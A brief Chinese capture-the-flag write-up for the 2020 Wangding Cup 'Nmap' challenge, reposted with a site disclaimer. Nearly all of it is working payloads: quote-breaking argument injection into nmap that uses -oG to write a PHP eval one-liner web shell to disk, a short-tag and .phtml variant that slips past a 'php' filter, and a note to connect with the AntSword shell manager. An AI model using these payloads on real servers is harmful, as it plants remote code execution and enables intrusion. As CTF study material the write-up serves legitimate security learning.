[網鼎杯 2020 朱雀組]Nmap


Nmap -oG 可以寫入文件 因此我們可以寫入一句話木馬

payload如下

' <?php @eval($_POST["hack"]);?> -oG hack.php '

結果回顯hacker php被過濾 因此考慮用短標簽繞過

' <?= @eval($_POST["pd"]);?> -oG pd.phtml '

用蟻劍連接即可


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM